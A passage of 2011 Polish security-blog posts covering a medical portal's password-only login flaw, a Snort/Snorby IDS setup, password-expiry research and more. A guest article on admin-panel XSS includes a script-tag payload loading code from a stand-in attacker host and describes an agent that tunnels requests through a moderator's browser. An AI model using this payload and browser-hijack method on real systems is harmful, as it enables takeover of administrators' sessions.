Powyższy sprzętowy bruteforcer stanowi więc fascynujący przykład myśli hakerskiej. Warto podkreślić nie tylko interesujące rozwiązanie sprzętowe, lecz również zręczne wykorzystanie fizycznych ograniczeń zamka. Aż szkoda, że najnowsze sejfy wykorzystują obecnie zamki elektroniczne, pozbawione już oczywiście tego typu mechanicznych ułomności. Jeśli znacie podobne niecodzienne implementacje ataków znanych na co dzień ze świata IT, oczywiście zachęcam do dyskusji na ich temat!

[źródło]

Jak Przychodnia.pl (nie) dba o bezpieczeństwo użytkowników?

2011-01-16T14:19:00.005+01:00

Serwis Przychodnia.pl reklamuje się jako Pierwsza Polska Przychodnia Internetowa, a jego misją jest ponoć wyjście na przeciw (pisownia oryginalna) potrzebom pacjentów, ułatwienie im odnalezienia podstawowych informacji z zakresu profilaktyki medycznej oraz skrócenie naszej drogi do lekarzy. Serwis ten jest całkiem popularny i m.in. umożliwia każdemu zarejestrowanie własnego użytkownika... a właściwie nie użytkownika, lecz hasła! Spójrzmy pokrótce na to, w jak kuriozalny sposób Przychodnia.pl wystawia swych użytkowników oraz ich dane personalne na realne niebezpieczeństwo.

Jeden z czytelników HCSL (bartek46op) zwrócił wczoraj moją uwagę na bardzo osobliwe podejście administracji serwisu Przychodnia.pl do tematu bezpieczeństwa własnych użytkowników. Zgodnie z zapewnieniami Bartka, wszelkie informacje na poniższy temat przekazywane przez niego osobom związanym z serwisem pozostały bez jakiejkolwiek odpowiedzi. Spójrzmy więc ku przestrodze, na co narażeni się użytkownicy tej wirtualnej przychodni.

Spójrzmy przede wszystkim na formularz rejestracji nowego użytkownika w serwisie:

Tylko zarejestrowany użytkownik w pełni skorzysta z wszystkich dobrodziejstw serwisu, musimy się więc zarejestrować. Próżno jednak szukać pola przeznaczonego na określenie własnej nazwy użytkownika. Otóż identyfikować będzie nas jedynie... unikalne hasło! Spróbujmy się więc zarejestrować z wykorzystaniem jakiegoś popularnego wśród internautów hasła:

Operacja nie udała się, zapewne jednak dlatego, że już ktoś takiego hasła użył. Cóż to oznacza? Potencjalny intruz może się teraz za pomocą tego hasła zalogować do serwisu i w ten sposób uzyska dostęp do wszystkich danych zgromadzonych tam przez pewnego innego użytkownika. Patrząc raz jeszcze na formularz rejestracji, może to być całkiem sporo szczegółowych danych teleadresowych. Warto zauważyć, że nawet poprzez małą pomyłkę we wpisywanym haśle, możemy się przez przypadek zalogować na konto innego użytkownika! To jednak nie koniec potencjalnych problemów mogących wynikać z tego typu ataku.

Jeśli dany użytkownik stosuje to samo hasło w różnych serwisach i usługach internetowych (a jak wiemy, praktycznie wszyscy mamy przecież do tego mniejsze lub większe skłonności), to intruz dysponujący danymi z formularza rejestracyjnego w Przychodnia.pl (takimi jak imię, nazwisko, miejscowość oraz adres e-mail) bez problemu będzie mógł również uzyskać dostęp do innych kont użytkownika odnalezionych potencjalnie w wielu innych serwisach internetowych. Warto również zauważyć, że sam serwis Przychodnia.pl oferuje również konta poczty e-mail:

Nie wiem jak bardzo usługa ta jest popularna wśród użytkowników wirtualnej przychodni, a może wśród lekarzy chcących mieć adres w domenie przychodnia.pl, możemy sobie jednak łatwo wyobrazić to, jak wygląda bezpieczeństwo poczty elektronicznej w tym serwisie.

Na koniec warto jeszcze tylko zauważyć, że w serwisie znajdują się również inne podatności na popularne typy ataków, a hasła wszystkich użytkowników są w ramach Przychodnia.pl przechowywane w postaci jawnej (niezaszyfrowanej):

Oczywiście ja również spróbuję się skontaktować w powyższych sprawach z administratorami serwisu, być może tym razem doczekamy się jakiejś odpowiedzi. Na chwilę obecną wszystkich użytkowników serwisu Przychodania.pl zachęcam jednak do rozważenia usunięcia z jego zasobów własnych kont lub upewnienia się, że dane tam zgromadzone nie przydadzą się w żaden sposób potencjalnym intruzom.

Przypominam, że nadal możecie głosować na HCSL!

Jak w ciągu 5 minut uruchomić profesjonalny system IDS?

2011-01-15T17:28:00.009+01:00

Sieciowe systemy wykrywania włamań, czyli systemy typu NIDS (ang. Network-based Intrusion Detection System) stanowią obecnie jeden z podstawowych mechanizmów obrony sieci i systemów komputerowych przed rozmaitymi atakami sieciowymi. Dziś chciałbym więc pokazać wam, w jak prosty i szybki sposób praktycznie każdy może skonfigurować i uruchomić własny tego typu system, i to w oparciu o zupełnie darmowe i w pełni otwarte oprogramowanie!

Na początek warto sobie przypomnieć to, czym tak naprawdę są systemy typu NIDS. Otóż stanowią one jeden z podstawowych mechanizmów ochrony sieci i systemów komputerowych, pozwalający na wykrywanie ataków w czasie rzeczywistym, np. poprzez analizę ruchu sieciowego w oparciu o pewne uprzednio zdefiniowane sygnatury, lub też statystyczne wykrywanie nietypowych zdarzeń (anomalii) komunikacyjnych.

Samo wykrywanie odbywa się więc na podstawie analizy przychodzących pakietów sieciowych i porównywania ich zawartości ze znanymi sygnaturami ataków. Rozwijane są również inne metody wykrywania, gdyż porównywanie ze wzorcami ma niezaprzeczalną wadę – dany atak może zostać wykryty tylko i wyłącznie, jeśli jego sygnatura została już umieszczona w bazie danego systemu NIDS. Dość popularne są również metody oparte o wykrywanie anomalii, które w przeciwieństwie do podejścia sygnaturowego, dają pewną nadzieję na wykrycie nieznanych do tej pory rodzajów ataków.

Tego typu systemem jest bardzo popularny i w pełni otwarty Snort, i to właśnie na jego podstawie zbudujemy nasz przykładowy sensor. Jednak do tej pory uruchomienie w pełni funkcjonalnego snortowego sensora wyposażonego jednocześnie w przyjazny webowy front-end (pozwalający na łatwą analizę alertów i podstawowe zarządzanie całym systemem) wymagało trochę zachodu i mogło stanowić spore wyzwanie dla początkujących. Wszystko to jednak zmienił Snorby.

Snorby to nowy otwarty, bardzo przyjazny i nowoczesny webowy front-end stworzony właśnie z myślą o Snorcie. Co jednak najciekawsze z punktu widzenia możliwości szybkiego uruchomienia profesjonalnego sensora IDS, w ramach całego projektu dostępny jest również obraz systemu typu Live CD, pozwalający praktycznie każdemu na natychmiastowe rozpoczęcie przygody z wykrywaniem włamań. Spójrzmy pokrótce na możliwości tego interesującego rozwiązania.

Otóż wystarczy tylko pobrać obraz systemu Insta-Snorby-0.6.iso i uruchomić z niego jakiś komputer fizyczny lub maszynę wirtualną. Do wyboru będziemy mieć instalację na dysku lub też tryb Live CD (świetnie nadaje się do testów, ale oczywiście nie do codziennej pracy w roli rzeczywistego systemu IDS). Po przejściu kilku kroków interaktywnej konfiguracji (warto zauważyć, że możliwe jest skonfigurowanie automatycznego pobierania nowych reguł) wszystko jest już gotowe do pracy. Nasz sensor jest już zdolny do wykrywania incydentów w ramach widocznego mu ruchu sieciowego, a my możemy się już połączyć z samym interfejsem Snorby za pomocą naszej przeglądarki:

Pora na mały test skuteczności wykrywania incydentów oraz sprawdzian możliwości oferowanych przez nowy webowy front-end. W celu zgromadzenia znacznej ilości przykładowych danych, z pomocą narzędzi zgromadzonych w ramach systemu BackTrack 4 R2 odpaliłem w kierunku kilku wirtualnych maszyn testowych tysiące rozmaitych ataków i exploitów, a cały ruch sieciowy był w zasięgu wzroku testowanego systemu IDS. Najwyraźniej nasz sensor rzeczywiście działa, a webowy interfejs od razu zachęca nas do analizy zarejestrowanych zdarzeń:

Oczywiście każde ze zdarzeń możemy dokładnie przeanalizować, włącznie z wyświetleniem zawartości złowrogich pakietów:

Do swej dyspozycji mamy również najrozmaitsze podsumowania zarejestrowanych zdarzeń:

Spójrzmy jeszcze na krótką filmową prezentację możliwości całego interfejsu:

Podsumowując, Snorby pozwala nam na niezwykle szybkie i bardzo proste uruchomienie w pełni funkcjonalnego sensora IDS Snort, i to wyposażonego w webowy front-end o naprawdę sporych możliwościach oraz intuicyjnej obsłudze. Moim zdaniem możliwości tego rozwiązania są większe od wielu systemów komercyjnych oraz od innych popularnych interfejsów stosowanych wraz ze Snortem (takich jak BASE). Wreszcie, dzięki Snorby Live CD, praktycznie każdy może teraz w ciągu kilku minut uruchomić swój własny sensor Snort i bez najmniejszego problemu rozpocząć zabawę z wykrywaniem włamań.

Jak zwykle, czekam również oczywiście na wasze opinie i spostrzeżenia dotyczące tego interesującego projektu! Poza tym, warto pamiętać, że nadal możecie oddawać swoje głosy na HCSL w ramach konkursu Blog Roku 2010.

Wszyscy jesteśmy najsłabszym ogniwem?

2011-01-14T21:17:00.003+01:00

Pokładanie nadziei w rozmaitych technologicznych zabezpieczeniach, to krótko mówiąc czysta naiwność. Każdy system i każde zabezpieczenie można złamać... lub po prostu obejść. Jeśli nie można złamać systemu, to można oszukać lub złamać jego operatora. Czasem wystarczy tylko wykorzystać jego ludzkie słabości. Niezmiennie najsłabsze ogniowo stanowi więc czynnik ludzki. Doskonale wiedzą o tym włamywacze, ale i specjaliści zajmujący się bezpieczeństwem. Jeśli jednak wy w to nie wierzycie, to zapraszam do obejrzenia pewnej ilustracji, która rozwieje w tym zakresie wszelkie wątpliwości...

Na pierwszy rzut oka poniższe zabezpieczenie wydaje się całkiem solidne, przyjrzycie się jednak uważnie:

Kto jest najsłabszym ogniwem?

Jaki z tego płynie wniosek dla osób zainteresowanych bezpieczeństwem informatycznym? Otóż żadne sprzętowe oraz programowe zabezpieczenia nie spełnią dobrze swej roli, jeśli ich operatorzy poprzez swą lekkomyślność (a czasem celowe działania) spowodują powstanie ogromnych luk w całym systemie.

Czy będzie to zbyt słabe hasło broniące dostępu do konta administracyjnego, czy też furtka pozostawiona przez kogoś w pełni umyślnie, tego typu przypadki stanowią zazwyczaj zagrożenie o wiele poważniejsze niż np. ryzyko związane z odkryciem nowej luki typu Zero Day w wykorzystywanym przez nas oprogramowaniu. Chcąc więc zabezpieczyć się przed tego typu zdarzeniami zawsze musimy sobie zadać pytanie o to, kto pilnuje naszych strażników? Jestem ciekaw jak wygląda to w waszych organizacjach? Czy w ich ramach istnieją działy kontrolujące poczynania administratorów oraz całego personelu IT?

Na koniec chciałbym tylko przypomnieć, że nadal możecie oddawać swoje głosy na HCSL. Poza tym, wszystko wskazuje na to, że już niedługo uda mi się zorganizować kolejny konkurs (zob. wyniki poprzedniego konkursu) dla wszystkich zainteresowanych bezpieczeństwem IT, zachęcam więc jak zwykle do zachowania czujności rewolucyjnej!

[źródło]

Nowy amerykański serial o... (nie)bezpieczeństwie!

2011-01-13T23:22:00.002+01:00

Amerykańska sieć telewizyjna FOX na 6. kwietnia zaplanowała emisję pierwszego odcinka nowego serialu Breaking In. Pewnie nie byłoby w tym fakcie nic szczególnie interesującego gdyby nie to, że cała akcja ma się rozgrywać wokół tematyki bezpieczeństwa informatycznego, bezpieczeństwa fizycznego, testów penetracyjnych oraz hackingu. Zachęcam więc do zwrócenia uwagi na zapowiedź nadchodzącej produkcji.

Telewizja FOX zapowiada nowy serial jako komedię rozgrywającą się w firmie zajmującej się bezpieczeństwem nowoczesnych technologii, niestety przed polskimi internautami amerykańscy filmowcy chcą jednak najwyraźniej coś ukryć:

Cóż, trailer możecie obejrzeć poniżej:

Wygląda więc na to, że firma prowadzona przez OZ'a (Christian Slater) sprzedaje swe usługi związane z bezpieczeństwem, zachęcając klientów do ich zakupu poprzez uprzednie naruszanie zabezpieczeń oraz inne rozmaite nieuczciwe praktyki. Z pewnością tego rodzaju sytuacje zdarzają się w rzeczywistości, tematyka serialu wydaje się więc całkiem interesująca.

Z dostępnych obecnie informacji wynika, że drużyna OZ'a będzie się przede wszystkim zajmować bezpieczeństwem fizycznym. Poruszana ma być jednak również tematyka hackingu, testów penetracyjnych oraz ogólnie pojętego bezpieczeństwa teleinformatycznego.

Jestem bardzo ciekaw tego, z jakim realizmem amerykańscy filmowcy podejdą do powyższych tematów. Z pewnością serial ten nie będzie posiadał zbyt wielu walorów edukacyjnych, ja jednak chętnie go obejrzę. Oczywiście, jeśli uda mi się jakoś obejść wszystkie zabezpieczenia telewizji FOX, mające chronić jej produkcje przed potencjalnymi widzami z nieodpowiednich państw. Jak zwykle jestem również ciekaw waszych opinii na temat Breaking In.

Szkolenie "Zaawansowane bezpieczeństwo aplikacji www"

2011-01-12T23:53:00.001+01:00

Wszystkie osoby zainteresowane zagadnieniami związanymi z bezpieczeństwem aplikacji www, zachęcam do wzięcia udziału w szkoleniu autorskim organizowanym przez firmę Securitum w dniach: 21-23.02.2011, w Krakowie. Świetny dobór tematów, prezentacje praktycznych ataków oraz prowadzący legitymujący się certyfikatem CISSP, wszystko to stanowi o unikalności szkolenia Zaawansowane bezpieczeństwo aplikacji www. Oczywiście i tym razem czytelnicy HARD CORE SECURITY LAB mogą liczyć na specjalne rabaty.

"Zaawansowane bezpieczeństwo aplikacji www" stanowi rozwinięcie tematyki poruszanej na szkoleniu: "Bezpieczeństwo aplikacji www". W ramach trzydniowych warsztatów przygotowano:

przeszło 30 ćwiczeń (jest to około 90% szkolenia),
1-miesięczną licencję na oprogramowanie burp suite pro (dla każdego uczestnika),
możliwość zdalnego dostępu (również po szkoleniu) do podatnych aplikacji, wykorzystywanych w trakcie warsztatów.

Ramowy program szkolenia wygląda natomiast następująco:

Wykrywanie i wykorzystywanie podatności - warsztaty
Zaawansowane ataki SQL injection - warsztaty
Ataki na system uwierzytelnienia i autoryzacji - warsztaty
Bezpieczeństwo AJAX - warsztaty
Zaawansowane funkcje oprogramowania Burp Suite Pro - warsztaty
Konfiguracja systemu WAF (web application firewall) - warsztaty
Podstawy realizacji testów penetracyjnych klasy whitebox (analiza kodu źródłowego)
Całościowy test bezpieczeństwa na aplikację w LAB - warsztaty

Wszystkich zainteresowanych powyższą tematyką zachęcam do skorzystania z formularza zgłoszeniowego. Jak zwykle w przypadku szkoleń organizowanych przez zaprzyjaźnioną z HCSL firmę Securitum, możecie liczyć na specjalny rabat (150 PLN).

Biorąc pod uwagę to, że tego typu profesjonalne, praktyczne szkolenia są w Polsce prawdziwą rzadkością, zachęcam wszystkich zainteresowanych do skorzystania z okazji do pogłębienia swej wiedzy w zakresie bezpieczeństwa aplikacji www.

HARD CORE SECURITY LAB Blogiem Roku 2010?

2011-01-11T23:38:00.004+01:00

Drodzy Czytelnicy! Zdecydowałem się na wzięcie udziału w konkursie Blog Roku 2010. Być może w ten sposób trafimy do kolejnych czytelników, którzy również będą zainteresowani swobodną wymianą wiedzy i doświadczeń z zakresu bezpieczeństwa informatycznego, dzięki czemu wszyscy będziemy mogli się znów czegoś nowego i interesującego nauczyć? Wszelkie ewentualne nagrody otrzymane w ramach tegoż konkursu, zostaną przeze mnie wykorzystane jako nagrody w kolejnym konkursie (zob. poprzedni konkurs) dla czytelników HCSL. Jeśli więc chcielibyście oddać swój głos na HARD CORE SECURITY LAB, wystarczy tylko wysłać SMS o treści B00246 na numer 7122. Koszt SMS, to 1,23 zł brutto.

Po co komu skimmery, gdy mamy pod ręką siekierę?

2011-01-10T19:17:00.001+01:00

Czytelnicy HARD CORE SECURITY LAB wielokrotnie mogli się już zapoznać z nowinkami technicznymi wykorzystywanymi przez złodziei okradających bankomaty, a dokładniej klientów z nich korzystających. Wiemy już również, że skimmery wykorzystywane do kopiowania kart płatniczych można bez większego problemu nabyć w Internecie, a ponieważ cały zestaw składa się zazwyczaj również z kamery rejestrującej kody PIN, to zasłanianie klawiatury bankomatu może nas niejednokrotnie uchronić przed utratą pieniędzy. Jak się jednak okazuje, są jeszcze na świecie złodzieje, którzy potrafią się obejść bez elektronicznych gadżetów...

Trudno w to uwierzyć, ale są takie miejsca na świecie, gdzie przestępcy zabierają się do okradania bankomatu mając na wyposażeniu jedynie broń białą! Z resztą zobaczcie sami...

Co myślicie o tym sposobie na bankomat? Może i nie jest najbardziej skuteczny, za to z pewnością temu przestępcy należą się słowa uznania za wierność rozbójniczej tradycji oraz nieuleganie gadżeciarstwu. Wszakże złodzieje korzystający ze skimmerów i innych elektronicznych gotowców, to przy nim jedynie marni script kiddies!

E.T. dzwoni do domu, czyli XSS w adminie

2011-01-08T19:45:00.003+01:00

Autorem poniższego opracowania jest Dariusz Tytko (użytkownik Gmaila: tyter9). Przy okazji przypomnę tylko, że praktycznie każdy może zostać autorem, a nawet redaktorem HARD CORE SECURITY LAB! Zachęcam również do zapoznania się z poprzednim artykułem Darka.

Typowa aplikacja webowa składa się z dwóch komponentów, portalu udostępniającego pewną funkcjonalność klientom oraz części umożliwiającej zarządzenie, czyli tytułowego "admina" (CMS). Kod portalu coraz częściej powstaje z uwzględnieniem zasad bezpiecznego programowania, niestety nie zawsze to samo można powiedzieć o drugim z wymienionych komponentów...

Taki stan rzeczy często tłumaczony jest na jeden z następujących sposobów: "tylko garstka zaufanych użytkowników korzysta z aplikacji", "to nasze autorskie rozwiązanie, nikt nie wie jak działa, tym bardziej nie będzie w stanie znaleźć błędu", "aplikacja dostępna jest tylko w sieci wewnętrznej" itp. W artykule postaram się wykazać, że taka polityka prowadzenia projektu, w niesprzyjających warunkach może doprowadzić do poważnych w skutkach konsekwencji.

Na potrzeby artykułu zaatakujemy prostą aplikację testową, która umożliwia użytkownikom wyrażanie swoich opinie w postaci komentarzy. Załóżmy, że w części portalowej nie udało nam się znaleźć żadnej z typowych podatności. Sytuacja wydaje się beznadziejna. Jedyna szansa dla potencjalnego intruza jest więc taka, że CMS zawiera jakieś błędy.

Pytanie jednak, jak zaatakować aplikację, której istnienia jedynie się domyślamy? Z dużym prawdopodobieństwem CMS tego typu aplikacji umożliwia moderację umieszczonych treści, co wiąże się z koniecznością ich wyświetlenia. Jeżeli nie zastosowano odpowiedniej walidacji, będziemy w stanie przeprowadzić atak typu XSS np. poprzez umieszczenie komentarza o następującej treści <script src="http://attacker/payload.js"></script>. Teraz pozostaje już tylko czekać, aż moderator wyświetli komentarz, a tym samym uruchomi nasz kod.

Kolejne pytanie brzmi, jak skonstruować użyteczny payload, bez jakiejkolwiek wiedzy na temat szczegółów działania aplikacji? Rozwiązaniem może być kod, który realizuje poniższy scenariusz:

Przeglądarka moderatora uruchamia nasz kod (agent).
Agent nawiązuje połączenie z aplikacją uruchomioną na naszym serwerze (kontroler).
Kontroler uruchamia serwer proxy.
Kontroler powiadamia nas o utworzeniu nowego tunelu (serwer proxy skojarzony z agentem uruchomionym w przeglądarce moderatora).
Wysyłamy zapytanie do serwera proxy.
Proxy wysyła zapytanie do kontrolera.
Agent pobiera treść zapytania od kontrolera.
Agent wykonuje zapytanie w przeglądarce moderatora (ajax).
Agent wysyła odpowiedź do kontrolera.
Kontroler przekazuje odpowiedź do serwera proxy.
Serwer proxy przekazuje odpowiedź do naszej przeglądarki.
(Idź do kroku 5).

Na potrzeby artykułu powstała aplikacja implementująca powyższy algorytm (etproxy). Dwa główne problemy, z którymi należało się zmierzyć to:

Implementacja kanału komunikacyjnego pomiędzy agentem a kontrolerem.
Czas życia agenta ograniczony do czasu wizyty moderatora na stronie uruchamiającej payload.

Do rozwiązania pierwszego problemu, użyty został mechanizm Cross-Origin Resource Sharing. W dużym skrócie: możliwe jest wykonywanie zapytań ajax'owych (i odczytywanie odpowiedzi) do dowolnej domeny, o ile strona wywoływana na to pozwoli (poprzez ustawienie odpowiednich nagłówków w odpowiedzi). Niestety rozwiązanie nie jest obsługiwane przez wszystkie przeglądarki, zwłaszcza te starsze.

Rozwiązanie drugiego problemu sprowadza się do pewnej sztuczki. W chwili uruchomienia agenta, do wszystkich linków na stronie podpięte zostaje zdarzenie (onclick), które blokuje możliwość opuszczenia strony. Zamiast tego, w chwili kliknięcia w link do struktury DOM dokumentu dodawany jest znacznik iframe, ze źródłem (src), na które wskazywał dany link (href). Dodatkowo iframe jest rozszerzany do 100% szerokości i wysokości okna, zakrywając w ten sposób bieżącą zawartość. W ten sposób użytkownikowi serwowana jest spodziewana zawartość, bez potrzeby przechodzenia na inną stronę. Rozwiązanie nie jest jednak pozbawione wad:

Użytkownik nawiguje w obrębie iframe'a, co wiąże się z konsekwencjami w postaci niezmieniającego się adresu strony (w pasku adresu).
Docelowa strona może zwierać mechanizmy, uniemożliwiające wyświetlenie jej zawartości w iframe'ie (patrz nagłówek X-Frame-Options itp.).
W dobie aplikacji ajax'owych, rolą niektórych linków może nie być przełączenie strony, a wykonanie bardziej złożonego zadania jak np. przeładowanie tylko jej części. Kliknięcie w zmodyfikowaną wersję takiego linku z dużym prawdopodobieństwem zakończy się załadowaniem pustego iframe'a.

Oto wspomniana aplikacja w akcji:

Przyznaję, że przeprowadzenie przedstawionego ataku, w warunkach rzeczywistych nie należy do rzeczy łatwych. Kluczowe znaczenie ma czas pracy użytkownika CMS'a. Nie mniej nie da się zaprzeczyć, że realne ryzyko istnieje. Decyzję, czy należy je uwzględnić w praktyce, pozostawiam czytelnikom.

HackJackpot, czyli jak okraść jednorękiego bandytę?

2011-01-08T04:19:00.004+01:00

W kasynie gier hazardowych zarabia wyłącznie właściciel oraz nieliczni gracze. Gracze odnoszący sukces dzielą się na tych którzy mają niezwykłe szczęście i tych którzy... oszukują. Historia oszustw związanych z grami hazardowymi jest tak stara, jak sam hazard, a pomysłowość oszustów zdaje się nie mieć żadnych granic. Całkiem niedawno zastanawiałem się nad tym, czy już w najbliższej przyszłości nieuczciwi hazardziści skupią się na lukach w oprogramowaniu wykorzystywanym przez kasyna oraz same nowoczesne automaty do gier hazardowych i wygląda na to, że właśnie jesteśmy świadkami zdemaskowania jednego z pierwszych tego typu przestępstw na masową skalę.

Nowoczesne kasyna gier hazardowych już od dawna masowo wykorzystują nowoczesne technologie informatyczne oraz automaty będące tak naprawdę komputerami pracującymi pod kontrolą wyspecjalizowanego oprogramowania. Nic więc dziwnego, że do skutecznego oszukania tego typu urządzeń wystarczy odkrycie jakiejś luki obecnej w ich oprogramowaniu.

Dwaj Amerykanie (John Kane oraz Andre Nestor) odkryli bardzo interesującą lukę w oprogramowaniu automatów do gry w pokera produkowanych przez firmę International Game Technology. Otóż jak się okazuje, wystarczyło tylko grać małymi stawkami do czasu uzyskania wygranej, a następnie za pomocą specjalnej sekwencji przycisków możliwe było znaczne podbicie stawki i ponowienie wygranej. Co ciekawe, taka wygrana nie była przez urządzenie logowana. W taki oto sposób dwaj mężczyźni nielegalnie zarobili co najmniej kilkaset tysięcy USD.

Warto również nadmienić, że przeprowadzenie skutecznego ataku zazwyczaj wymagało również od nieuczciwych hazardzistów wykonania małego ataku socjotechnicznego. Otóż magiczna sekwencja przycisków działała wyłącznie wtedy, gdy na urządzeniu uprzednio aktywowana została mało popularna funkcja double-up (zwiększająca wygrane, ale i również ryzyko gracza). Zazwyczaj jednak mężczyznom udawało się przekonać obsługę kasyna do zmiany ustawień poszczególnych automatów.

Gdy już chciwość zawładnęła umysłami mężczyzn i ich masowe wygrane zaczęły przyciągać uwagę, rozpoczęło się federalne śledztwo. W jego wyniku w niedługim czasie mężczyźni zostali aresztowani przez FBI pod odpowiednimi zarzutami federalnymi. Andre Nestor wydaje się jednak być takimi zarzutami zdziwiony, gdyż jego zdaniem cała działalność nie była nielegalna:

Przecież tylko naciskałem przyciski na automatach! Czy teraz wygrywanie pieniędzy w kasynie jest już nielegalne? (...) To nie moja wina, że oprogramowanie pozwalało graczowi na swobodne wygrywanie!

Moim zdaniem w całej sprawie najbardziej interesująca jest jednak sama luka obecna w oprogramowaniu automatów. Czy sekwencja przycisków pozwalająca na swobodne wygrywanie (z pominięciem logowania takiego zdarzenia!) to rzeczywiście luka, czy może jednak funkcja celowo zaimplementowana przez producenta? Być może jest to po prostu furtka celowo pozostawiony przez samego programistę tworzącego oprogramowanie urządzenia? Ile tego typu ukrytych funkcji jest obecnych w popularnych automatach do gier hazardowych i ile osób wie o ich istnieniu?

[źródło]

Czy okresowe wymuszanie zmiany haseł ma jakikolwiek sens?

2011-01-06T17:13:00.003+01:00

Uwierzytelnianie, czyli weryfikowanie zadeklarowanej tożsamości użytkowników rozmaitych usług oraz systemów informatycznych, od zarania cyfrowych dziejów odbywa się z wykorzystaniem nieśmiertelnych haseł dostępowych. Od wielu lat rozmaite polityki bezpieczeństwa informatycznego niezmiennie wymagają zaś wdrożenia mechanizmów wymuszających okresowe (np. comiesięczne) zmiany wszystkich haseł dostępowych. Słuszność takiego podejścia od dawna budzi spore wątpliwości, brakowało jednak solidnych dowodów na całkowite podważenie sensu częstego wymuszania zmiany poświadczeń.

Oczywiście użytkownicy systemów informatycznych wymuszających częste zmiany haseł już od dawna mają w tej sprawie wyrobione własne zdanie. Ich zdaniem tego typu mechanizmy są pozbawione jakiegokolwiek sensu i tylko utrudniają pracę. Z pewnością hasło, które wyekspirowało w momencie, w którym dany system był najbardziej potrzebny, może doprowadzić użytkownika do szewskiej pasji. Nie jest również tajemnicą, że sami administratorzy systemów informatycznych czasem również wątpią w sens częstego wymuszania zmiany haseł.

Hasło znów wygasło w najmniej odpowiednim momencie?

Wymuszanie częstej zmiany haseł na pewno może w jakimś stopniu zmniejszyć produktywność pracowników. Ile czasu miesięcznie zajmuje przeciętnemu użytkownikowi skuteczna zmiana 5 haseł broniących dostępu do 5 różnych wykorzystywanych przez niego na co dzień systemów i programów? Z moich obserwacji wynika, że wdrożenie systemu zarządzania tożsamością (w skrócie pozwalającego na zalogowanie się do każdego systemu za pomocą tych samych poświadczeń) nie zawsze w pełni rozwiązuje ten problem, gdyż często po zmianie hasła występuje efekt oczekiwania na skuteczne rozpropagowanie się nowych poświadczeń pośród wszystkich systemów IT. Ile czasu taki użytkownik poświęca również na kontakty z działem wsparcia informatycznego, niezbędne w przypadkach zapominania niedawno zmienionych haseł? Do tej pory brakowało jednak wyraźnych dowodów na to, że częste wymuszanie zmiany haseł poza powyższymi przypadłościami, nie wpływa również wcale pozytywnie na bezpieczeństwo.

Trzej badacze, a mianowicie Yinqian Zhang, Fabian Monrose oraz Michael K. Reiter, przeprowadzili jednak pierwsze zakrojone na dużą skalę badania nad bezpieczeństwem współczesnych mechanizmów wymuszania zmiany haseł i trzeba przyznać, że opublikowane wyniki są bardzo interesujące i niepokojące zarazem. Okazało się przykładowo, że stosunkowo prosty algorytm pozwala na odgadnięcie bieżących haseł typowego użytkownika na podstawie znajomości jego poprzednich haseł nawet w 90% przypadków! 41% haseł udawało się w taki sposób złamać w czasie krótszym niż 3 sekundy...

Cóż się więc okazuje? Otóż mechanizm czasowej ważności haseł zazwyczaj w ogóle nie spełnia swego zadania (nie powstrzyma intruza od dalszego uzyskiwania dostępu do danego konta po kolejnej zmianie hasła), gdyż użytkownicy zmieniając hasła na kolejne, stosują zazwyczaj frazy niewiele różniące się od poprzednich (np. zmiana hasła jan.kowalski01 na jan.kowalski02. Zagadka: jakiego hasła Jan Kowalski używa w czerwcu?) i przez to bardzo proste do ponownego odgadnięcia.

Wygląda więc na to, że okresowe wymuszanie zmiany haseł, tak powszechnie dziś stosowane jako jeden z elementów polityki bezpieczeństwa wielu firm i organizacji, jedynie zmniejsza produktywność użytkowników, zwiększa poziom ich frustracji oraz praktycznie w ogóle nie zwiększa bezpieczeństwa systemów informatycznych! Ponownie okazuje się więc, że faktyczna skuteczność automatycznych mechanizmów mających wymuszać określone zachowania użytkowników jest niewielka.

Znacznie lepsze efekty przyniosłoby prawdopodobnie odpowiednie wytłumaczenie użytkownikom prawdziwego sensu okresowej zmiany haseł. Być może wtedy zrozumieliby, że zastępowanie hasła jan.kowalski01 frazą jan.kowalski02 podważa sens całej operacji. Być może również przedstawienie oraz zaproponowanie użytkownikom naszych systemów alternatywnych metod generowania silnych i unikalnych haseł pozwoliłoby na całkowite wyeliminowanie haseł typu jan.kowalski01? Wreszcie warto się również zastanowić nad tym, czy uwierzytelnianie oparte o tradycyjne hasła nie powinno już przypadkiem być jedynie reliktem XX wieku?

[źródło]

Kaspersky najlepszym antywirusem na świecie?

2011-01-03T00:01:00.001+01:00

Współczesne programy antywirusowe niestety nie są idealne. Nieuchronnie spowalniają działanie naszego systemu, wymagają ciągłych aktualizacji, ich skuteczność nadal pozostawia wiele do życzenia, a czasem nawet same stanowią zagrożenie o wiele większe od najgroźniejszych wirusów! Niektórych z powyższych wad pozbawione są oczywiście programy korzystające z modelu przetwarzania w chmurze, jednak i tego typu rozwiązania w żadnym razie nie mogą nam obecnie zaoferować stuprocentowo skutecznej ochrony. Dziś dla odmiany, spójrzmy natomiast na rozwiązania antywirusowe oczyma... speców od marketingu zatrudnionych w firmie Kaspersky.

Co jak co, ale pomysłowości firmie Kaspersky nigdy nie można było odmówić, a oto w jaki sposób rosyjski producent zachwala rzekome rozliczne zalety swego antywirusa:

Moim zdaniem pomysł na powyższą reklamę był naprawdę świetny, a ochrona przed wściekłymi latającymi krowami to cecha naprawdę unikalna. Co ciekawe, spece od marketingu zatrudnieni w firmie Kaspersky muszą sobie świetnie zdawać sprawę z głównych bolączek użytkowników antywirusów, skoro tak bardzo podkreślają właśnie szybkość oraz skuteczność własnego produktu...

Zdecydowanie Kaspersky jest więc najlepszym antywirusem na świecie, oczywiście w kategorii Najlepsza reklama. Chyba, że znacie jeszcze lepsze reklamy programów ochronnych?

Szpiegowskie boty do zadań specjalnych

2011-01-02T18:48:00.002+01:00

Grupa RedTeam Security od pewnego czasu rozwija bardzo interesujący projekt szpiegowskiego bota do zadań specjalnych. PlugBot to miniaturowy komputer wyposażony w rozmaite przewodowe oraz bezprzewodowe interfejsy sieciowe, pozwalający intruzowi (lub pentesterowi symulującemu przebieg prawdziwego włamania) na długotrwałe utrzymanie dostępu do wewnętrznej infrastruktury informatycznej należącej do docelowej organizacji. Spójrzmy na praktyczne możliwości, potencjalne zastosowania oraz przyszłość PlugBota.

Zabezpieczenia fizyczne oraz maksymalne ograniczenie postronnym osobom możliwości nawiązania połączenia z przewodowymi oraz bezprzewodowymi sieciami lokalnymi (prywatnymi) to jedne z najważniejszych fundamentów całego bezpieczeństwa IT. Nawet jeśli w ramach naszej lokalnej (prywatnej) sieci pracują dziurawe serwery oraz stacje robocze, a żaden intruz (lub pentester) nie będzie w stanie w jakikolwiek sposób uzyskać dostępu do samej sieci, to jego działania najprawdopodobniej spełzną na niczym.

